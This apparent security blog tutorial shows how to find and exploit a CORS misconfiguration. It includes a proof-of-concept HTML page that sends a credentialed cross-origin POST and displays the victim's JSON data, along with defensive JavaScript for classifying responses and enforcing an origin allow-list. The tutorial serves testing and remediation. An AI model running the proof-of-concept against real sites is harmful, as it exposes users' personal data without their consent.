
Exploit CORS By POST Request

Short Description of CORS


An HTML5 cross-origin resource sharing (CORS) policy controls whether and how content running on other domains can perform two-way interaction with the domain that publishes the policy. The policy is fine-grained and can apply access controls per-request based on the URL and other features of the request.
Trusting arbitrary origins effectively disables the same-origin policy, allowing two-way interaction by third-party web sites. Unless the response consists only of unprotected public content, this policy is likely to present a security risk.
If the site specifies the header Access-Control-Allow-Credentials: true, third-party sites may be able to carry out privileged actions and retrieve sensitive information. Even if it does not, attackers may be able to bypass any IP-based access controls by proxying through users' browsers.


How to Verify CORS Misconfiguration
(Any application that exposes an API to the browser may carry a CORS misconfiguration.)

Case 1 >> Check the request header
Capture the /API/JSON or /Ajax/index/data request in Burp and send it to Repeater, then check whether the response data is reflected or not.
  • If JSON data is reflected in the response, there is a possibility of CORS misconfiguration.
  • Change the Origin header and check the response again. If no data is reflected in the response any more, CORS is patched.
Case 2 >> Check the response header
  • Check for Access-Control-Allow-Origin* in the response.
  • If Access-Control-Allow-Origin* is present and JSON data is present in the response, there is a CORS misconfiguration.
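The two manual checks above (is JSON data in the body, and what does the server say in Access-Control-Allow-Origin when the Origin header is changed?) can be written down as one classification routine so that every probe is judged the same way. The following is an added example and not code from the original post; the header values, origins and JSON bodies in SAMPLES are constructed, and assessCors() is a hypothetical helper name. It also separates the case the post exploits (origin reflected together with Access-Control-Allow-Credentials: true) from the harmless cases (wildcard without credentials, no CORS headers, or an allow-list that names a different origin), which the checklist above treats alike.

```javascript
// Added example (not from the original post): classify the headers of a CORS probe
// the same way the manual Burp check above does, so the judgement is repeatable.
// Header names are matched case-insensitively; the origins and bodies below are constructed.

function normaliseHeaders(headers) {
  const out = {};
  for (const [name, value] of Object.entries(headers)) {
    out[name.toLowerCase()] = String(value).trim();
  }
  return out;
}

// True when the body parses as non-empty JSON: the "data is reflected" test.
function bodyHasJsonData(body) {
  if (typeof body !== 'string' || body.trim() === '') return false;
  try {
    const parsed = JSON.parse(body);
    return parsed !== null && typeof parsed === 'object' && Object.keys(parsed).length > 0;
  } catch (e) {
    return false;
  }
}

// probeOrigin: the Origin value sent in the modified request (e.g. 'https://attacker.example').
// responseHeaders / body: what the server answered to that request.
function assessCors(probeOrigin, responseHeaders, body) {
  const h = normaliseHeaders(responseHeaders);
  const acao = h['access-control-allow-origin'];
  const credentials = (h['access-control-allow-credentials'] || '').toLowerCase() === 'true';
  const hasData = bodyHasJsonData(body);

  let verdict;
  if (acao === undefined) {
    verdict = 'no-acao';                      // browser blocks the cross-origin read
  } else if (acao === '*') {
    verdict = credentials ? 'wildcard-with-credentials' : 'wildcard';
  } else if (acao === probeOrigin) {
    verdict = credentials ? 'reflected-origin-with-credentials' : 'reflected-origin';
  } else {
    verdict = 'other-origin';                 // an allow-list that does not include the probe
  }

  // The response only matters if a foreign page is allowed to read it and it carries data.
  let risk = 'none';
  if (hasData) {
    if (verdict === 'reflected-origin-with-credentials') {
      risk = 'high';                          // the victim's own session data is readable
    } else if (verdict === 'reflected-origin' || verdict === 'wildcard' ||
               verdict === 'wildcard-with-credentials') {
      // Readable, but only as an unauthenticated fetch: browsers refuse '*' for
      // credentialed requests, so '*' plus credentials behaves like plain '*'.
      risk = 'low';
    }
  }
  return { acao, credentials, hasData, verdict, risk };
}

// Constructed sample responses covering the cases in the checklist above.
const SAMPLES = [
  { name: 'reflects attacker origin with cookies',
    origin: 'https://attacker.example',
    headers: { 'Access-Control-Allow-Origin': 'https://attacker.example',
               'Access-Control-Allow-Credentials': 'true',
               'Content-Type': 'application/json' },
    body: '{"email":"user@example.test","phone":"000-0000"}' },
  { name: 'public wildcard, no credentials',
    origin: 'https://attacker.example',
    headers: { 'Access-Control-Allow-Origin': '*' },
    body: '{"version":"1.0"}' },
  { name: 'no CORS headers at all',
    origin: 'https://attacker.example',
    headers: { 'Content-Type': 'application/json' },
    body: '{"email":"user@example.test"}' },
  { name: 'allow-listed first-party origin only',
    origin: 'https://attacker.example',
    headers: { 'Access-Control-Allow-Origin': 'https://app.example',
               'Access-Control-Allow-Credentials': 'true' },
    body: '{"email":"user@example.test"}' },
];

function runSamples(samples = SAMPLES) {
  return samples.map(s => ({ name: s.name, ...assessCors(s.origin, s.headers, s.body) }));
}

for (const r of runSamples()) {
  console.log(r.name.padEnd(40), r.verdict.padEnd(36), r.risk);
}
```

Only the first sample reproduces the condition exploited later in this post: the probe origin comes back verbatim in Access-Control-Allow-Origin, credentials are allowed, and the body holds user data. A wildcard without credentials means the data was public to begin with, and with no header or with a different allow-listed origin the browser never hands the body to the foreign page.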

How to exploit 
In the picture the request method is POST and Access-Control-Allow-Origin* is present in the response.

In this picture the request method is POST, Access-Control-Allow-Origin* is present in the response, and JSON data is present as well, including the user's possibly sensitive information such as email, phone number, address and a lot more.






After that, host this script on your local server:

<html>
<script>
  // Credentialed cross-origin POST to the vulnerable endpoint; the browser attaches
  // the victim's cookies because withCredentials is set.
  var req = new XMLHttpRequest();
  req.onload = reqListener;
  req.open('POST', 'https://abc.com/ajax/index/init', true);
  req.withCredentials = true;
  req.send('{}');
  // Called once the response arrives; shows the JSON the server returned.
  function reqListener() { alert(this.responseText); }
</script>
</html>



After that, open the browser's Network tab and check the request and response; here the script executes successfully.






Here I got all the possible sensitive information of the user.
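The fix for what the post demonstrates belongs on the server: the Origin header has to be compared against an exact allow-list instead of being echoed back, and the comparison has to run on the real request, because a POST whose body is sent as text/plain (which is what XMLHttpRequest.send('{}') produces when no Content-Type is set) is a "simple" request that reaches the endpoint without any OPTIONS preflight. The following is an added example and not code from the original post or from the application it describes; ALLOWED_ORIGINS, the origins, the endpoint body and the names reflectAnyOrigin, corsHeadersFor, handle and simulate are all constructed or hypothetical.

```javascript
// Added example (not from the original post): the server-side origin check that closes
// the hole exploited above. reflectAnyOrigin() is the vulnerable pattern; corsHeadersFor()
// is the hardened one. The allow-list, the origins and the JSON body are constructed.

// Hypothetical allow-list of first-party origins; real deployments load this from config.
const ALLOWED_ORIGINS = new Set(['https://app.example', 'https://admin.example']);

// Vulnerable: echo whatever Origin the browser sent and allow credentials with it.
// Any page on the web can then read the logged-in user's response.
function reflectAnyOrigin(origin) {
  if (!origin) return {};
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Hardened: exact string match against the allow-list (no prefix, suffix or regex
// matching), never "null", and Vary: Origin so a shared cache never serves one
// origin's headers to another.
function corsHeadersFor(origin, allowed = ALLOWED_ORIGINS) {
  if (typeof origin !== 'string' || origin === 'null' || !allowed.has(origin)) {
    return { Vary: 'Origin' };
  }
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    Vary: 'Origin',
  };
}

// Request handler in the shape Node's http.createServer(handle) expects. A text/plain
// POST, as sent by the PoC script above, is a "simple" request and arrives here with no
// preflight, so the origin check must run on every request, not only on OPTIONS.
function handle(req, res) {
  const cors = corsHeadersFor(req.headers.origin);
  for (const [name, value] of Object.entries(cors)) res.setHeader(name, value);

  if (req.method === 'OPTIONS') {
    // Preflight for non-simple requests (e.g. Content-Type: application/json).
    if (cors['Access-Control-Allow-Origin']) {
      res.setHeader('Access-Control-Allow-Methods', 'POST, GET, OPTIONS');
      res.setHeader('Access-Control-Allow-Headers', 'Content-Type');
    }
    res.writeHead(204);
    res.end();
    return;
  }

  // The body is the same for every caller; without a matching Access-Control-Allow-Origin
  // the browser refuses to hand it to the page that made the request.
  res.setHeader('Content-Type', 'application/json');
  res.writeHead(200);
  res.end(JSON.stringify({ email: 'user@example.test', phone: '000-0000' }));
}

// Minimal stand-in for http.ServerResponse so the handler can be exercised without a socket.
function simulate(method, origin) {
  const out = { status: 0, headers: {}, body: '' };
  const res = {
    setHeader: (name, value) => { out.headers[name.toLowerCase()] = value; },
    writeHead: (status) => { out.status = status; },
    end: (body) => { out.body = body || ''; },
  };
  handle({ method, headers: origin ? { origin } : {} }, res);
  return out;
}

for (const o of ['https://app.example', 'https://attacker.example', 'null', undefined]) {
  const r = simulate('POST', o);
  console.log(String(o).padEnd(26), 'ACAO =', r.headers['access-control-allow-origin'] || '(absent)');
}
```

The vulnerable and hardened functions return the same headers for an allow-listed origin; they differ only for everything else, which is exactly the request the PoC page sends. Note that the hardened handler still returns the JSON body with status 200 to a foreign origin: the protection is the missing Access-Control-Allow-Origin header, which makes the browser withhold the body from the calling script, so checking only the status code in the Network tab is not enough to confirm a fix.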











Thanks




